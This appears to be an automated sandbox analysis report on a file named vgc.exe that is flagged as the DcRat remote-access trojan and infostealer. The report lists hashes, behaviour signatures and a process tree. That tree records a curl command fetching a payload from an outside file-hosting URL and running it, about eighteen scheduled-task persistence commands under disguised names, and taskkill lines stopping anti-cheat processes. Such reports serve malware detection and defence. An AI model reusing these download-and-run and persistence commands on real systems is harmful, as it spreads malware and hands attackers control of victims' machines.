Overview

overview

10

Static

static

3

vgc.exe

windows10-2004-x64

10

vgc.exe

windows10-ltsc 2021-x64

10

vgc.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    32s
  • max time network
    34s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07-12-2024 03:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vgc.exe

  • Size

    56KB

  • MD5

    6b66076ea9dd9855bb6f8592f3778299

  • SHA1

    0851a6843651c4a890f5417eede54c76bb2357b2

  • SHA256

    fa2b6e2595af4fd8b7e4cedc88daf254d829132be6cb5e51fd4dbce8323f1665

  • SHA512

    0dc87c60fc6c0106fb79344de207a0b17ef3c46cef0ad8035cb3fc91393c1167b0189c6ae80114b938b227136ea62b9f08be756a81846d4303d7bfd81e8db1b4

  • SSDEEP

    768:T/lUHY89mrZe0xBz71sGRQGsUfzG27YNkTjq7FUMHJH:T/loM71RQGsuzZFnq7FUm

Score
10/10
dcratdiscoveryinfostealerrat

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\vgc.exe
    "C:\Users\Admin\AppData\Local\Temp\vgc.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:3600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\system32\curl.exe
          curl --silent https://file.garden/Z1LZlLbjjD-R7xcm/build.bin --output C:\Windows\Speech\physmeme.exe
          3⤵
          • Drops file in Windows directory
          PID:4924
      • C:\Windows\Speech\physmeme.exe
        "C:\Windows\Speech\physmeme.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:392
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5108
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3468
            • C:\ESD\Winver.exe
              "C:\ESD/Winver.exe"
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3988
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HgPKhHR7vT.bat"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4768
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  7⤵
                    PID:3856
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:4852
                  • C:\Windows\Provisioning\vgc.exe
                    "C:\Windows\Provisioning\vgc.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:720
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c taskkill /f /im vgtray.exe >nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im vgtray.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3256
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c taskkill /f /im vgc.exe >nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im vgc.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3260
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2516
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1076
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5020
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3556
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5044
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1040
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgcv" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\vgc.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2264
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgc" /sc ONLOGON /tr "'C:\Windows\Provisioning\vgc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3844
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgcv" /sc MINUTE /mo 10 /tr "'C:\Windows\Provisioning\vgc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1700
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3048
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2324
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1672
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgcv" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\vgc.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3912
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\vgc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4496
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "vgcv" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\vgc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1212
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 9 /tr "'C:\ESD\Winver.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5000
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:540
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 8 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2200

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe
        Filesize

        222B

        MD5

        8decf43a92645d8ba4b81696c5e7b1ae

        SHA1

        dcc9ca8b24e3adf7568eb0f6b7f5cd27f039faf6

        SHA256

        6ad34bd4e803fad802052423aeab64f4c60dd3ee55a3167425b9640ae24bfea1

        SHA512

        72e44773f484d2e69ebd41cc555d9a57c833b3930e1f3b0326c90882035e0dc5fb54e8d4ded22cf9f2d28fb502b37b133b7c1c9f9d89b8c21857b569c51ebc17

        Download Submit

      • C:\ESD\Winver.exe
        Filesize

        1.8MB

        MD5

        d9ce1032fee5365065a78bbff7267883

        SHA1

        4c7471b47d4151908dd204303421d7c64cf4c5c6

        SHA256

        65d26e7c0b856832e88efefe5c2a9e767fb2a7345715bbd0a6e10f9ac2afb520

        SHA512

        0455364fa91c07da6fecbfb3e3fdbbbcb909e3176b5b151e3653f8b8ebffc02e14fb3471245df479b83f90cd2e1142bcff82b80555cfb3df113696b2925d9435

        Download Submit

      • C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat
        Filesize

        57B

        MD5

        d1a4f1e326e7dfca62327ea69446dc7c

        SHA1

        253e264c90cbd15836d8c3a1eab3c26756d94047

        SHA256

        ea091556a5dbab314a6029817a9db64f9b8adc7afb476bbbb11aec0c227f0de2

        SHA512

        3d4624c169297b50329a4e13f3f559a7a1f02112f6482e45cfba747dad11c6e6642f1411cec5e92d7890f86fb38702f48c75fec4d24332d43484ad7b9dbf29c8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\HgPKhHR7vT.bat
        Filesize

        159B

        MD5

        4915fb4f7db6b722e340a09a465a64f5

        SHA1

        ace7e51ab4842d02e3bf0c7559d09a4e81fa21ae

        SHA256

        58d7dbdeb005e1e1acc270d80912c3c3d62b0c1012d9769da8a4e14642755158

        SHA512

        d5ad1f43c933b1424dd0c4590693a7684bf45ecc3cea77622ecba05163246f2328d4321bff264097e37c9e459aab57b52e1b6b108f187bcd55fde6683ad62709

        Download Submit

      • C:\Windows\Speech\physmeme.exe
        Filesize

        2.1MB

        MD5

        6261ec3f13e1cc6ae25ee8942db137b0

        SHA1

        20629ed3f752869dc4980827291bf3064333405f

        SHA256

        a6429d9778a93254c7387cf588619a2635ed97108558a122de885aad25a57eb7

        SHA512

        ed292a77db5e9926cbaa247e449a4019776b2452d2e8cdadfcea4c3d7551372793b2a1125b44cfd5106d2b03ff178041d413750ee81bfc42d7a3252a934b51f1

        Download Submit

      • memory/720-48-0x000000001CE60000-0x000000001CE6D000-memory.dmp

        Filesize

        52KB

        Download

      • memory/720-47-0x000000001C9D0000-0x000000001C9D9000-memory.dmp

        Filesize

        36KB

        Download

      • memory/720-50-0x000000001CE90000-0x000000001CE9B000-memory.dmp

        Filesize

        44KB

        Download

      • memory/720-49-0x000000001CE70000-0x000000001CE8E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/720-46-0x000000001CC10000-0x000000001CC56000-memory.dmp

        Filesize

        280KB

        Download

      • memory/3988-15-0x0000000000140000-0x0000000000314000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/3988-17-0x0000000000D00000-0x0000000000D0E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/3988-19-0x000000001AFD0000-0x000000001AFEC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/3988-22-0x000000001AFF0000-0x000000001B008000-memory.dmp

        Filesize

        96KB

        Download

      • memory/3988-20-0x000000001B370000-0x000000001B3C0000-memory.dmp

        Filesize

        320KB

        Download